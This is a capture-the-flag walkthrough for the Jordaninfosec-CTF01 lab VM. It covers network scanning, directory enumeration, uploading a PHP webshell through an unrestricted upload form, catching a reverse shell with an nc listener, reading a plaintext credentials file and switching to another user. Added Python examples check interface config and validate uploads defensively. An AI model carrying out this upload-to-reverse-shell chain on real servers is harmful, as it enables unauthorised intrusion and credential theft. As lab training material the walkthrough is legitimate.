Background

Note: the initial IP lookup found nothing; it turned out the target VM's network interface had never been brought up.

Fix:

  • At the GRUB boot menu, press the 'e' key.
  • Find the ro entry on the kernel line.
  • Change it to rw single init=/bin/bash.
  • Press Ctrl+X to boot into bash, then run ip a to see the interface names.
  • Check the interface configuration: vim /etc/network/interfaces
  • Change the interface name in that file so it matches the name shown by ip a, then restart networking.
  • Run /etc/init.d/networking restart
  • After that the VM obtains an IP address.
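The mismatch behind that fix (an ifupdown stanza naming an interface the kernel no longer has) can be spotted without booting into a rescue shell. The following is an added example, not part of the original writeup; the interface names, the config stanza and the ip -o link lines are constructed samples (the MAC is the one nmap reported for the target).

```python
import re

# Constructed sample: an /etc/network/interfaces still naming eth0 (hypothetical).
SAMPLE_INTERFACES = """\
auto lo
iface lo inet loopback

auto eth0
iface eth0 inet dhcp
"""

# Constructed sample of `ip -o link` output on the same VM after the NIC was renamed.
SAMPLE_IP_LINK = """\
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000\\    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
2: ens33: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN mode DEFAULT group default qlen 1000\\    link/ether 00:0c:29:c2:68:53 brd ff:ff:ff:ff:ff:ff
"""

def configured_interfaces(text):
    """Interface names referenced by auto/allow-hotplug/iface lines in ifupdown config."""
    names = set()
    for line in text.splitlines():
        m = re.match(r"\s*(?:auto|allow-hotplug|iface)\s+(\S+)", line)
        if m:
            names.add(m.group(1))
    return names

def kernel_interfaces(text):
    """Interface names from `ip -o link`; each line starts with 'N: name: <flags>'."""
    names = set()
    for line in text.splitlines():
        m = re.match(r"\d+:\s+([^:@\s]+)", line)
        if m:
            names.add(m.group(1))
    return names

def stale_interfaces(interfaces_text, ip_link_text):
    """Configured names with no matching kernel link: these stanzas can never come up."""
    return sorted(configured_interfaces(interfaces_text) - kernel_interfaces(ip_link_text))

def fix_interface_name(interfaces_text, old, new):
    """Rewrite auto/iface stanzas from `old` to `new`, i.e. the manual vim edit above."""
    pattern = r"(?m)^(\s*(?:auto|allow-hotplug|iface)\s+)" + re.escape(old) + r"\b"
    return re.sub(pattern, r"\g<1>" + new, interfaces_text)

if __name__ == "__main__":
    print("configured but absent:", stale_interfaces(SAMPLE_INTERFACES, SAMPLE_IP_LINK))
```

On a live system, feed it the real file contents: open("/etc/network/interfaces").read() and the output of ip -o link.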

Information gathering

arp-scan -l to locate the target, 192.168.32.129

┌──(root💀kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:3a:85:4a, IPv4: 192.168.32.128
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.32.1 00:50:56:c0:00:08 VMware, Inc.
192.168.32.2 00:50:56:f0:a6:e2 VMware, Inc.
192.168.32.129 00:0c:29:c2:68:53 VMware, Inc.
192.168.32.254 00:50:56:f4:b7:bc VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 1.861 seconds (137.56 hosts/sec). 4 responded

┌──(root💀kali)-[~]
└─#

nmap -p- 192.168.32.129 to find the open ports

┌──(root💀kali)-[~]
└─# nmap -p- 192.168.32.129
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-21 14:07 CST
Nmap scan report for 192.168.32.129
Host is up (0.00079s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:C2:68:53 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.74 seconds

┌──(root💀kali)-[~]
└─#

Browsing the site on port 80 shows a login page; with no idea of any credentials, brute-forcing it is unlikely to succeed.

Directory scan with dirb

┌──(root💀kali)-[~]
└─# dirb http://192.168.32.129 /usr/share/dirb/wordlists/big.txt

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sat Aug 21 14:14:01 2021
URL_BASE: http://192.168.32.129/
WORDLIST_FILES: /usr/share/dirb/wordlists/big.txt

-----------------

GENERATED WORDS: 20458

---- Scanning URL: http://192.168.32.129/ ----
==> DIRECTORY: http://192.168.32.129/admin_area/
==> DIRECTORY: http://192.168.32.129/assets/
==> DIRECTORY: http://192.168.32.129/css/
==> DIRECTORY: http://192.168.32.129/flag/
==> DIRECTORY: http://192.168.32.129/js/
+ http://192.168.32.129/robots.txt (CODE:200|SIZE:160)
+ http://192.168.32.129/server-status (CODE:403|SIZE:302)
==> DIRECTORY: http://192.168.32.129/uploaded_files/

First flag

Check robots.txt

Going through the files it lists one by one reveals a set of login credentials and the second flag.

File upload

Try logging in to login.php with those credentials.

After logging in, the page turns out to be a file upload form (which practically invites uploading a backdoor).

Upload a shell obtained from somewhere (note: a PHP one-liner webshell, or a backdoor generated by any of the usual exploitation frameworks, would also do).

Click Browse to select the file, then Upload file; afterwards "Success" appears in the top-left corner, as shown in the screenshot.
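The upload form accepts shell.php as-is and serves it from /uploaded_files/, which is the whole weakness this scenario turns on. Below is an added example (not code from the original writeup or from the target application, which is PHP) of the server-side checks an upload handler should apply; the allowlist of image types and the sample filenames and bytes are constructed.

```python
import os
import re

# Allowlist of extensions the form is meant to accept (assumption: images only),
# each paired with the magic bytes a genuine file of that type starts with.
ALLOWED_TYPES = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}
# Any of these in the body means the file is script, whatever its name claims.
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<script", b"<%")

def validate_upload(filename, data):
    """Return (ok, reason). Rejects anything that could execute under /uploaded_files/."""
    base = os.path.basename(filename)
    if base != filename or base in ("", ".", ".."):
        return False, "path component in filename"
    # Exactly one extension: shell.php fails the allowlist, shell.php.jpg fails here.
    parts = base.lower().split(".")
    if len(parts) != 2 or not re.fullmatch(r"[a-z0-9_-]{1,64}", parts[0]):
        return False, "unexpected filename shape"
    ext = parts[1]
    if ext not in ALLOWED_TYPES:
        return False, "extension not allowed: " + ext
    if not any(data.startswith(magic) for magic in ALLOWED_TYPES[ext]):
        return False, "content does not match " + ext
    if any(marker in data for marker in SCRIPT_MARKERS):
        return False, "script marker inside file body"
    return True, "ok"

def safe_store_name(filename):
    """Server-chosen name: random stem plus the validated extension, never the client's name."""
    ext = filename.rsplit(".", 1)[1].lower()
    return os.urandom(8).hex() + "." + ext

# Constructed samples, not files taken from the target VM.
SAMPLES = {
    "shell.php": b"<?php echo 'hi'; ?>",
    "shell.php.jpg": b"\xff\xd8\xff\xe0<?php echo 'hi'; ?>",
    "../../html/x.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 16,
    "photo.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 16,
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(name, validate_upload(name, body))
```

Pair this with a web-server rule that disables script execution inside the upload directory (for Apache with mod_php, php_admin_flag engine off in a Directory block for uploaded_files), so a file that slips past validation still cannot run.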

Connecting to the backdoor

The directory scan earlier turned up /uploaded_files/; try that path to see whether the uploaded shell can be reached.

It is found and loads successfully.

Enter the password built into shell.php.

Logged in.

Going to the web root reveals a flag directory, flag.txt and hint.txt.

The flag directory holds the first flag found earlier; flag.txt opens empty (a permissions problem);

hint.txt contains the third flag and a hint that finding user technawi's password allows reading flag.txt.

Reverse shell

Command used: find / -user 'technawi' 2>/dev/null

But command execution in this web shell is unreliable, so a proper shell is needed; the web shell has a reverse-shell feature that provides one.

Meanwhile, in the Kali terminal, start nc listening:

┌──(root💀kali)-[~]
└─# nc -lvp 12388
listening on [any] 12388 ...

Then click to start the connection:

┌──(root💀kali)-[~]
└─# nc -lvp 12388
listening on [any] 12388 ...
192.168.32.129: inverse host lookup failed: Unknown host
connect to [192.168.32.128] from (UNKNOWN) [192.168.32.129] 60222
Linux Jordaninfosec-CTF01 4.4.0-72-generic #93-Ubuntu SMP Fri Mar 31 14:07:41 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
uid=33(www-data) gid=33(www-data) groups=33(www-data)

A shell comes back, but run python3 -c "import pty;pty.spawn('/bin/bash')" to get a stable, usable one:

┌──(root💀kali)-[~]
└─# nc -lvp 12388
listening on [any] 12388 ...
192.168.32.129: inverse host lookup failed: Unknown host
connect to [192.168.32.128] from (UNKNOWN) [192.168.32.129] 60222
Linux Jordaninfosec-CTF01 4.4.0-72-generic #93-Ubuntu SMP Fri Mar 31 14:07:41 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
uid=33(www-data) gid=33(www-data) groups=33(www-data)
python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@Jordaninfosec-CTF01:/var/www/html/uploaded_files$

Now run the search again: find / -user 'technawi' 2>/dev/null

www-data@Jordaninfosec-CTF01:/var/www/html/uploaded_files$ 
/etc/mysql/conf.d/credentials.txt
/var/www/html/flag.txt
/home/technawi
/home/technawi/.cache
/home/technawi/.bash_history
/home/technawi/.sudo_as_admin_successful
/home/technawi/.profile
/home/technawi/.bashrc
/home/technawi/.bash_logout
www-data@Jordaninfosec-CTF01:/var/www/html/uploaded_files$

Reading credentials.txt gives the fourth flag and technawi's credentials:

www-data@Jordaninfosec-CTF01:/var/www/html/uploaded_files$ cat /etc/mysql/conf.d/credentials.txt
<1:/var/www/html/uploaded_files$ cat /etc/mysql/conf.d/credentials.txt
The 4th flag is : {7845658974123568974185412}

username : technawi
password : 3vilH@ksor
www-data@Jordaninfosec-CTF01:/var/www/html/uploaded_files$

su technawi to switch user:

www-data@Jordaninfosec-CTF01:/var/www/html/uploaded_files$ su technawi
su technawi
Password: 3vilH@ksor

technawi@Jordaninfosec-CTF01:/var/www/html/uploaded_files$

Reading flag.txt in the web root gives the fifth flag:

technawi@Jordaninfosec-CTF01:/var/www/html/uploaded_files$ cd ..
cd ..
technawi@Jordaninfosec-CTF01:/var/www/html$ ls -la
ls -la
total 60
drwxr-xr-x 8 www-data www-data 4096 Apr 21 2017 .
drwxr-xr-x 3 www-data www-data 4096 Aug 21 08:44 ..
drwxrwxr-x 2 www-data www-data 4096 Apr 21 2017 admin_area
drwx------ 5 www-data www-data 4096 Apr 19 2017 assets
-rw-r--r-- 1 www-data www-data 306 Apr 19 2017 check_login.php
drwx------ 2 www-data www-data 4096 Apr 19 2017 css
drwxr-xr-x 2 www-data www-data 4096 Apr 21 2017 flag
-rw-r----- 1 technawi technawi 132 Apr 21 2017 flag.txt
-rw-r--r-- 1 www-data www-data 145 Apr 21 2017 hint.txt
-rw-rw-r-- 1 www-data www-data 1966 Apr 19 2017 index.php
drwx------ 2 www-data www-data 4096 Apr 19 2017 js
-rw-rw-r-- 1 www-data www-data 1485 Apr 19 2017 login.php
-rw-r--r-- 1 www-data www-data 128 Apr 19 2017 logout.php
-rw-rw-r-- 1 www-data www-data 160 Apr 19 2017 robots.txt
drwxrwxr-x 2 www-data www-data 4096 Aug 21 09:24 uploaded_files
technawi@Jordaninfosec-CTF01:/var/www/html$ cat flag.txt
cat flag.txt
The 5th flag is : {5473215946785213456975249}

Good job :)

You find 5 flags and got their points and finish the first scenario....
technawi@Jordaninfosec-CTF01:/var/www/html$